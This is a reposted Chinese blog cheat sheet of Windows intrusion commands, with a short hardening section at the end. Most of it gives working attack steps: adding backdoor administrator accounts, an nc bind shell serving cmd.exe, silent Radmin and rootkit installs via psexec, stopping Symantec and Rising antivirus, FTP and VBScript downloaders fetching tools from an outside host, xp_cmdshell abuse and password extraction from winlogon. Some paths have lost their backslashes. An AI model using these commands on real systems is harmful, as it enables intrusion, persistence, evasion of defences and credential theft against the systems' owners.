一些經典DOS命令
(1) 執行cmd命令
l 通過在“執行”選單中執行cmd或者command指令。
l 通過程式的附件執行“命令提示符”
l 直接在反彈的shell中(一般是遠端控制軟體中)
說明:在有些情況下,管理員對cmd命令進行了限制,這就需要更換cmd.exe為其它一個名字,或者從本地上傳一個檔案上去。
(2) 建立目錄:mkdir test
(3) 更換當前路徑:cd test
(4) 生成檔案:netstat –an >netlog.txt
(5) 檢視檔案屬性:dir /a /s
(6) 查詢指定網路連線:netstat –an |find “80” /3389
(7) 給檔案加上/還原屬性:attrib –h-s-r-a
(8) 建立新資料夾: mkdir hacker
(9) 移動檔案netlog.txt到hacker資料夾
l move netlog.txt c:hacker
l move netlog.txt c: esthacker
(10)新增新管理員hacker
net user hacker wshacker /add
net localgroup administrators hacker /add
net user hacker
net user hacker wshakcer!!
(11)使用nc命令
l 監聽命令
netstat –an |find “8080”
nc -vv -l -p 8080 / nc -vv -l -p 8080
nc -l -p port>log.txt
l 程式定向
nc -l -p 5277 -t -e cmd.exe
在對方機器上執行,使其成為一臺telnet伺服器.
l 掃描對方埠
nc -v -ip port
eg nc -v 172.16.81.1 80
l 掃描對方tcp埠
nc -v -z ip port -port
l 掃描對方udp埠
nc -v -z -u ip port-port
l 上傳檔案
本地機器上執行:nc -v -n ip port<x:svr.exe
遠端機器上執行:nc -v -l -p port >y:svr.exe
(12)檢視系統時間:net time net view /net session /net use
(13)使用at命令:
at 檢視當前所有列表
at 9:01 “net user aspnet wshakcer /add ”
net time
說明該命令一般是配合net time命令使用
(14)檢視遠端終端連線情況:query user /quser
(15)登出遠端終端使用者:logoff 1/2/3
(16)命令模式安裝radmin遠端控制軟體
前提:將radmin的三個服務端檔案(admdll.dll,raddrv.dll,r_server.exe)放入一個資料夾,並且已經獲得了被入侵機器的管理員密碼。
copy *.* \192.168.45.219admin$system32
psexec \192.168.45.219 -u user –p password cmd
然後執行命令:
netstat -an |find “4899”
net stop r_server
r_server.exe /pass:wshacker /port:4899 /save /silence
r_server.exe /install /silence
net start r_server
net start r_server
netstat -an |find “4899”
netstat -an |find “4899”
(17)安裝rootkit
將ntboot.exe ntboot.dll拷入系統目錄,然後執行ntboot –install命令,rootkit對80埠有效,尤其對提供web服務的埠。
客戶端呼叫比較簡單:
cli->ip地址->80埠
(18)停止和啟動服務。
Net stop /net start “服務名稱”
以下命令停止防毒軟體
net stop “Symantec AntiVirus”
net stop “Symantec AntiVirus Definition Watcher”
net stop “Symantec Event Manager”
net stop “Symantec Settings Manager”
net stop “System Event Notification”
(19)獲取網路配置情況:ipconfig /all
(20)使用指令碼下載
echo open 192.168.45.219>b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get radmin.exe>>b(可以是一系列的可執行檔案)
echo bye >>b
ftp -s:b
del b
echo open 192.168.45.219 >1
echo user bin bin >>1
echo bin >>1
echo get wt.exe >>1
echo bye >>1
ftp -n -s:1
del 1
(21)dl.vbe
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject(“adodb.stream”):set web=createobject(“microsoft.xmlhttp”) >>dl.vbe
echo web.open “get”,.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll
cscript dl.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll
cscript dl.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
cscript dl.vbe [url]http://192.168.45.219/tools//mt.exe[/url] mt.exe
cscript dl.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe
(22). iget.vbe
net stop “RsRavMon Service”
net stop “Rising Personal Firewall Service”
net stop “Rising Process Communication Center“
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.vbe
echo xPost.Open “GET”,iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = createObject(“ADODB.Stream”) >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
dir iget.vbs
cscript iget.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll
cscript iget.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll
cscript iget.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
cscript iget.vbe [url]http://192.168.45.219/tools/mt.exe[/url] mt.exe
cscript iget.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe
cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe
cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll
cscript iget.vbe [url]http://192.168.45.219/tools/server.exe[/url] server.exe
cscript iget.vbe [url]http://192.168.45.219/tools/lsaext.dll[/url] lsaext.dll
cscript iget.vbe [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe
cscript iget.vbe [url]http://192.168.45.219/tools/sfind.exe[/url] sfind.exe
cscript iget.vbe [url]http://192.168.45.219/tools/fp.exe[/url] fp.exe
cscript iget.vbe [url]http://192.168.45.219/tools/pulist.exe[/url] pulist.exe
cscript iget.vbe [url]http://192.168.45.219/tools/pskill.exe[/url] pskill.exe
(23)使用軟體下載
wt down [url]http://192.168.45.219/tools/AdmDll.dll[/url]
wt down [url]http://192.168.45.219/tools/regsrc.exe[/url]
wt down [url]http://192.168.45.219/tools/raddrv.dll[/url]
mt -netget [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll
mt -netget [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe
mt -netget [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
mt -netget [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe
(24)在網站上覆制檔案
copy c: mp*.exe c:winntsystem32inetsrvdata
使用網頁木馬的檔案上傳功能。
(25)使用SQL Server 2000的xp_cmdshell
exec master.dbo.xp_cmdshell ‘命令’ —執行命令
use master –使用哪一個資料
exec master.dbo.xp_cmdshell `net user aspnet wshacker /add`
exec master.dbo.xp_cmdshell `net localgroup administrators asp2net /add`將指令碼通過網頁提交
exec xp_cmdshell `echo set fso1=createobject(“scripting.filesystemobject”)>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo Set WshShell = Wscript.CreateObject(“Wscript.Shell”)>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo spa=WshShell.Environment(“process”)(“windir”) >>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo set fil =fso1.opentextfile(spa & “system32aa.txt”) >>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo do while not fil.atendofstream>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo nr=fil.readline>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo if left(nr,4)=”Path” then>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo pa=mid(nr,instr(nr,”)”)+3,len(nr)-instr(nr,”)”)-3)>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo exit do>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo end if>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo loop>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo set fil1 =fso1.opentextfile(pa&”dd.asp”,2,true)>>c:
ead.vbs`
ead.vbs`
exec xp_cmdshell `echo fil1.writeline “<%response.write request.servervariables(“”APPL_PHYSICAL_PATH””)%>”>>c:
ead.vbs`
ead.vbs`
(26)查詢使用者的密碼:
l 使用pulist.exe檢視使用者的程式,找到winlogon的PID.
l 然後執行findpass.exe 域名(機器名) 使用者名稱 PID
例如: findpass.exe a administrator 204
mt –findpass
[url]ftp://192.168.99.254[/url]
(27)使用ps
l 顯示所有程式
ps /a
dir *.exe>exeback.txt & dir *.dll>dllback.txt
ps.exe /a /m >nowdlls.txt
(28)壓縮檔案
rar a -r myrar d:sinba
(29)計算機管理控制檯程式
compmgmt.exe
dcomcnfg.exe 元件服務程式
devmgmt.exe 裝置管理器程式
fsmgmt.exe 共享檔案管理
lusrmgr.msc 本地使用者和組
eventvwr.msc 日誌管理器
ht檔案
ht -fku
ht -key mima
ht -ps
htk -fku
htk -key 218123409252
htk -ps
htk -pslist
htk -pass
htk -fpass
htk -pss 192.168.1.6
htk -s 192.168.1.6 -show -run
htk -share -add 211.72.212.81 admin$
htk -share -add 211.72.50.10 admin$
安全防護
(1) 檢視執行服務與埠
fport /p
(2)檢視開放的檔案及其程式
handle.exe([url]http://www.sysinternals.com/ntw2k/freeware/handle.shtml.[/url])
handle -p iexplore handle
(3)進行登陸等時間的審計(gpedit)
(4)嚴格安全日誌的管理(應用程式日誌、系統日誌、安全時間日誌)
嚴格限制%SystemRoot%system32config目錄訪問許可權,僅限管理員訪問
eventvwr.msc更改日誌檔案的預設大小
(5)去掉預設檔案共享
HKey_Local_MachineSYSTEMCurrentControlSetServiceslanmanserverparameters
新建DWORD鍵“AutoShareServer”值為0
net share
(6)加密使用者所在檔案的臨時目錄temp
C:Documents and Settings<username>Local Settings
(7)清楚頁面檔案
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management 將ClearPageFileAtShutdown鍵值設定為1
(8)嚴格控制應用程式的訪問許可權
使用win2000 資源AppSec
本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/46571
相關文章
- windows下一些常用的dos命令Windows
- ORACLE SQL命令經典OracleSQL
- fragment一些經典用法Fragment
- 一些簡單的快捷鍵與DOS命令
- Dos命令
- linux常用 經典命令Linux
- dos命令大全
- dos 命令大全
- DOS命令全集
- 常用DOS命令
- 基本dos命令
- Linux一些經典書籍Linux
- 日常工作最常用的一些DOS命令總結
- 一些Linux試題(經典!!)(轉)Linux
- Windows常用dos命令Windows
- 常見dos命令
- 基本的Dos命令
- DOS命令之Date命令的用法
- git常用命令(史上最經典)Git
- GCD&&LCM的一些經典問題GC
- 一些經典的計算機書籍計算機
- dos命令的學習
- 常見的DOS命令
- DOS下常用BAT命令BAT
- DOS 常用命令
- DOS-ping命令
- DOS命令的換行
- dos2unix命令
- DOS 批處理命令
- 相關dos命令合集
- Dos常用命令
- SQLServer2005的一些經典SQLSQLServer
- 常見d部分dos命令
- dos命令安裝證書
- 部分快捷鍵與DOS命令
- 程式猿的一些幽默趣聞 個個經典
- 程式猿的一些幽默趣聞 個個經典
- 5個經典有趣的 Linux 命令列技巧Linux命令列